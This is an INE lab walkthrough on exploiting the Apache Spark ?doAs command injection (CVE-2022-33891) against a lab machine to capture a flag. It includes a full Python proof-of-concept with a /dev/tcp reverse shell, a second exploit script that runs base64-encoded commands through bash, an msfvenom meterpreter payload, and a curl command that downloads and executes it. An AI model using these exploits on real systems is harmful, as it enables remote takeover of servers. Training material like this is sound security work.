Resources
    Lab Walkthrough - Apache ...
    24 August 22

    Lab Walkthrough - Apache Spark Shell Command Injection

    Posted byINE
    facebooktwitterlinkedin
    news-featured

    In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    Purpose: We are learning about how to exploit Apache Spark using the Metasploit Framework module. Also, we will use the python language to write/modify existing scripts for exploiting the Apache Spark application. 

    Technical difficulty: Beginner

    Introduction

    In 2022, a critical Shell Command Injection vulnerability was found in the Apache Spark server. The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. An authentication filter, checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as.

    This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.

    The vulnerability was discovered by Kostya Kortchinsky, a cybersecurity researcher from Databricks.

    Read More: https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc

    What is Command Injection?

    A cyberattack known as command injection includes running unauthorized commands on the host operating system. Usually, the threat actor inserts the orders by taking advantage of an application flaw, like inadequate input validation.

    Lab Link: https://my.ine.com/CyberSecurity/courses/ebd09929/cyber-security-vulnerabilities-training-library/lab/0bc4e7a4-7959-4531-b0fd-ab38764a48c7

    apache_spark_lab_link.png

    Lab Environment

    In this lab environment, the user will access a Kali GUI instance. A vulnerable machine Apache Spark deployed on http://demo.ine.local:8080

    Goal after completing this scenario: Access the /flag.txt file and read the flag!

    apache_spark_0.png

    Tools

    The best tools for this lab are:

    • Nmap

    • Bash Shell

    • Metasploit Framework

    • Python

    What is Apache Spark?

    Apache Spark is a multi-language engine for executing data engineering, data science, and machine learning on single-node machines or clusters.

    Apache Spark Key features

    Batch/streaming data

    Unify the processing of your data in batches and real-time streaming, using your preferred language: Python, SQL, Scala, Java or R.

    SQL analytics

    Execute fast, distributed ANSI SQL queries for dashboarding and ad-hoc reporting. Runs faster than most data warehouses.

    Data science at scale

    Perform Exploratory Data Analysis (EDA) on petabyte-scale data without having to resort to downsampling

    Machine learning

    Train machine learning algorithms on a laptop and use the same code to scale to fault-tolerant clusters of thousands of machines.

    Source: https://spark.apache.org/

    Vulnerability Configuration

    • Enable the ACLs via the configuration option spark.acls.enable. i.e, conf/spark-defaults.conf

    Vulnerable Source Code

    Link: https://github.com/apache/spark/pull/36315/files#diff-96652ee6dcef30babdeff0aed66ced6839364ea4b22b7b5fdbedc82eb655eeb5L41

    private def getUnixGroups(username: String): Set[String] = {
    -    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
       // we need to get rid of the trailing "\n" from the result of command execution
    -    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
    +   Utils.executeAndGetOutput(idPath ::  "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
     }
    }

    CVE-2022–33891

    • Vulnerable parameter

    http://demo.ine.local:8080/?doAs=`[command injection here]`

    The command injection occurs because Spark checks the user group membership passed in the ?doAs parameter by using a raw Linux command.

    User commands are processed through ?doAs parameter, and nothing is reflected back on the page during command execution, so this is blind OS injection. Your commands run, but there will be no indication if they worked or not or even if the program you’re running is on target.

    OS commands that are passed on the URL parameters ?doAs will trigger the background Linux bash process, which calls **cmdseq** and will run the process with the command line id, -Gn.

    Source: https://www.socinvestigation.com/cve-2022-33891-apache-spark-shell-command-injection-detection-response

    Solution

    Step 1: Open the lab link to access the Kali machine.

    Kali machine

    apache_spark_1.png

    Step 2: Check if the provided machine is reachable.

    Command:

    ping -c 4 demo.ine.local
    apache_spark_2.jpg

    The provided machine is reachable.

    Step 3: Check all open ports on the machine.

    Command:

    nmap demo.ine.local
    apache_spark_3.jpg

    Multiple ports are open. The Apache Spark server is running on port 8080.

    Step 4: Run the firefox browser and access port 8080 to identify the Apache Spark server version.

    URL: http://demo.ine.local:8080

    apache_spark_4.jpg

    apache_spark_4_1.jpg

    The target Apache Spark server version is 3.1.1.

    Step 5: Running the command on the target using the vulnerable parameter “?doAs.”

    Just type the URL on the Kali terminal.

    Command:

    http://demo.ine.local:8080?doAs=`id`
    apache_spark_5.jpg

    Successfully executed id command on the target server and received an output.

    Note: You won’t receive the output of all Linux commands

    This confirms that the target is vulnerable to CVE-2022–33891

    Step 6: Writing a nmap script that will detect the vulnerable spark version, i.e., 3.1.1

    Nmap script

    -- The Head Section --
    description = [[The script to detect The Apache Spark Shell Command Injection vulnerability]]
    ---
    -- @usage
    -- nmap --script detect-spark-vuln <target>
    -- @output
    -- PORT   STATE SERVICE
    -- 8080/tcp open  http
    -- |_detect-spark-vuln: Apache Spark is Vulnerable to Command Injection
    categories = {"default", "safe"}
    local shortport = require "shortport"
    local http = require "http"
    local stdnse = require "stdnse"
    local string = require "string"
    -- The Rule Section --
    portrule = shortport.http
    -- The Action Section --
    action = function(host, port)
       local uri = "/"
       local text1 = "3.1.1"
       local response = http.get(host, port, uri)
       if ( response.status == 200 ) then
           local bodystr = string.match(response.body, text1)
           if ( bodystr == text1 ) then
               return "Apache Spark is Vulnerable to Command Injection!!"
           else
               return "Apache Spark Not Vulnerable!!"
           end
       end
    end

    The script is pretty straightforward. It accesses the target on port 8080 and matches the given string, i.e., 3.1.1, then gives an output if it’s vulnerable or not.

    Save the above code on the attacker’s machine and run it. The file extension should be .nse

    Commands:

    nano detect-spark-vuln.nse

    <paste code>

    apache_spark_6.jpg

    Run the script.

    nmap — script detect-spark-vuln.nse demo.ine.local
    apache_spark_6_1.jpg

    Successfully detected the Apache Spark server version 3.1.1 using a nmap custom script.

    Step 7: Running the python script to detect the Apache Spark Command Injection vulnerability

    Python Script

    #!/usr/bin/env python3
    import requests
    import argparse
    import base64
    import datetime
    from colorama import Fore
    parser = argparse.ArgumentParser(description='CVE-2022-33891 Python POC Exploit Script')
    parser.add_argument('-u', '--url', help='URL to exploit.', required=True)
    parser.add_argument('-p', '--port', help='Exploit target\'s port.', required=True)
    parser.add_argument('--revshell', default=False, action="store_true", help="Reverse Shell option.")
    parser.add_argument('-lh', '--listeninghost', help='Your listening host IP address.')
    parser.add_argument('-lp', '--listeningport', help='Your listening host port.')
    parser.add_argument('--check', default=False, action="store_true", help="Checks if the target is exploitable with a sleep test")
    parser.add_argument('--verbose', default=False, action="store_true", help="Verbose mode")
    args = parser.parse_args()
    # nothing to see here, move along!
    headers = {
       'User-Agent': 'CVE-2022-33891 POC',
    }
    # Colors :D
    info = (Fore.BLUE + "[*] " + Fore.RESET)
    recc = (Fore.YELLOW + "[*] " + Fore.RESET)
    good = (Fore.GREEN + "[+] " + Fore.RESET)
    important = (Fore.CYAN + "[!] " + Fore.RESET)
    printError = (Fore.RED + "[X] " + Fore.RESET)
    full_url = f"{args.url}:{args.port}"
    def check_for_vuln(url):
       try:
           print(info + "Attempting to connect to site...")
           r = requests.get(f"{url}/?doAs='testing'", allow_redirects=False, headers=headers)
           if args.verbose:
               print(info + f"URL request: {url}/?doAs='testing'")
               print(info + f"Response status code: {r.status_code}")
           if r.status_code != 403:
               print(printError + "No ?doAs= endpoint. Does not look vulnerable.")
               quit(1)
           elif "org.apache.spark.ui" not in r.content.decode("utf-8"):
               print(printError + "Does not look like an Apache Spark server.")
               quit(1)
           else:
               print(important + "Performing sleep test of 10 seconds...")
               t1 = datetime.datetime.now()
               if args.verbose:
                   print(info + f"T1: {t1}")
               run_cmd("sleep 10")
               t2 = datetime.datetime.now()
               delta = t2-t1
               if args.verbose:
                   print(info + f"T2: {t2}")
                   print(info + f"Delta T: {delta.seconds}")
               if delta.seconds not in range(8,12):
                   print(printError + "Sleep was less than 10. This target is probably not vulnerable")
               else:
                   print(good + "Sleep was 10 seconds! This target is probably vulnerable!")
               exit(0)
       except Exception as e:
           print(printError + str(e))
    def cmd_prompt():
       cmd = input("[cve-2022-33891> ")
       return cmd
    def base64_encode(cmd):
       try:
           message_bytes = cmd.encode('ascii')
           base64_bytes = base64.b64encode(message_bytes)
           base64_cmd = base64_bytes.decode('ascii')
           return base64_cmd
       except Exception as e:
           print(printError +str(e))
    def run_cmd(cmd):
       try:
           if args.verbose:
               print(info + "Command is: " + cmd)
           base64_cmd = base64_encode(cmd)
           if args.verbose:
               print(info + "Base64 command is: " + base64_cmd)
           exploit = f"/?doAs=`echo {base64_cmd} | base64 -d | bash`"
           exploit_req = f"{full_url}{exploit}"
           if args.verbose:
               print(info + "Full exploit request is: " + exploit_req)
               print(info + "Sending exploit...")
           r = requests.get(exploit_req, allow_redirects=False, headers=headers)
           if args.verbose:
               print(info + f"Response status code: {r.status_code}\n"+ info + "Hint: 403 is good.")
       except Exception as e:
           print(printError + str(e))
           quit(1)
    def revshell(lhost, lport):
       print(info + f"Reverse shell mode.\n" + recc+ f"Set up your listener by entering the following:\nnc -nvlp {lport}")
       input(recc + "When your listener is set up, press enter!")
       rev_shell_cmd = f"sh -i >& /dev/tcp/{lhost}/{lport} 0>&1"
       run_cmd(rev_shell_cmd)
    def main():
       try:
           if args.check and args.revshell:
               print(printError + "Please choose either revshell or check!")
               exit(1)
           elif args.check:
               check_for_vuln(full_url)
           # Revshell
           elif args.revshell:
               if not (args.listeninghost and args.listeningport):
                   print(printError + "You need --listeninghost and --listeningport!")
                   exit(1)
               else:
                   lhost = args.listeninghost
                   lport = args.listeningport
                   revshell(lhost, lport)
           else:
               # "Interactive" mode
               print(info + "\"Interactive\" mode!\n" + important + "Note: you will not receive any output from these commands. Try using something like ping or sleep to test for execution.")
               while True:
                   command_to_run = cmd_prompt()
                   run_cmd(command_to_run)
       except KeyboardInterrupt:
           print("\n"+ info + "Goodbye!")
    if __name__ == "__main__":
       main()

    Copy and paste the above code into the Kali GUI and run the PoC code to check if target version is vulnerable or not.

    Check the script help option.

    Command:

    python3 PoC.py — help
    apache_spark_7.jpg

    Running the script to verify the vulnerability.

    Command:

    python3 PoC.py -u http://demo.ine.local -p 8080 — check — verbose
    apache_spark_7_1.jpg

    Target appears to be vulnerable.

    Step 8: Rewriting a simple python script to execute a command on the target server

    Python Script

    import requests
    import argparse
    import json
    import random
    import string
    import base64
    my_parser = argparse.ArgumentParser(description='Apache Spark Command Injection')
    my_parser.add_argument('-T', '--URL', type=str)
    args = my_parser.parse_args()
    target = args.URL
    def shell(target):
       url = target
       r = requests.get(target)
       if r.status_code == 200:
          print("[+] Exploiting")
          print("[+] Getting the shell... :)")
          while 1:
              try:
                  command = input("# ")
                  command_to_encode = command.encode('ascii')
                  base64_format = base64.b64encode(command_to_encode)
                  base64_final_cmd = base64_format.decode('ascii')
                  print("Base64 Command: " + base64_final_cmd)
                  payload = f"/?doAs=`echo {base64_final_cmd} | base64 -d | bash`"
                  exploiting = f"{url}{payload}"
                  print(exploiting)
                  r = requests.get(exploiting, allow_redirects=False)
                  print("Command Executed")
              except KeyboardInterrupt:
                  sys.exit("\nBye")
       else:
           print ("[*] Some issue accrued.")
    shell(target)

    Copy and paste the above code in the Kali GUI and run the PoC code to gain the meterpreter shell.

    apache_spark_8.jpg

    Check the Attacker Machine IP address:

    Command:

    ip addr
    apache_spark_8_1.jpg

    Generate the .elf malicious executable for reverse connection.

    Command:

    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.27.2 LPORT=4444 -f elf > shell.elf
    file shell.elf
    apache_spark_8_2.jpg

    Start Python simple HTTP server to serve the shell.elf file.

    Command:

    python3 -m http.server 80
    apache_spark_8_3.jpg

    Start Metasploit multi-handler for the new meterpreter session.

    Command:

    msfconsole -q
    use exploit/multi/handler
    set PAYLOAD linux/x64/meterpreter/reverse_tcp
    set LHOST 10.10.27.2
    exploit
    apache_spark_8_4.jpg

    Check if the script is running correctly by checking its help option.

    Command:

    python3 New-PoC.py — help
    apache_spark_8_5.jpg

    It’s working fine. Run the script and download the shell.elf file on the target machine using curl by exploiting the vulnerability.

    Command:

    python3 New-PoC.py — URL http://demo.ine.local:8080
    apache_spark_8_6.jpg

    Command:

    curl http://10.10.27.2/shell.elf — output /tmp/shell.elf; chmod +x /tmp/shell.elf; /bin/bash -c “/tmp/shell.elf”
    apache_spark_8_7.jpg

    Successfully downloaded the shell.elf file in the /tmp/ directory and executed it on the target machine. After the execution of the shell.elf file received a meterpreter session:

    apache_spark_8_8.jpg

    Step 9: Find the flag.

    Command:

    ls /
    cat /flag.txt
    apache_spark_9.jpg

    FLAG: aad8ee70c54f1cc0c0aad082423b09fe

    Mitigation

    • Upgrade to supported Apache Spark maintenance release 3.1.3, 3.2.2, or 3.3.0 or later

    References

    1. Apache Spark

    2. PoC

    3. CVE-2022–33891

    Try this lab for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    © 2024 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.
    instagram Logofacebook Logotwitter Logolinkedin Logoyoutube Logo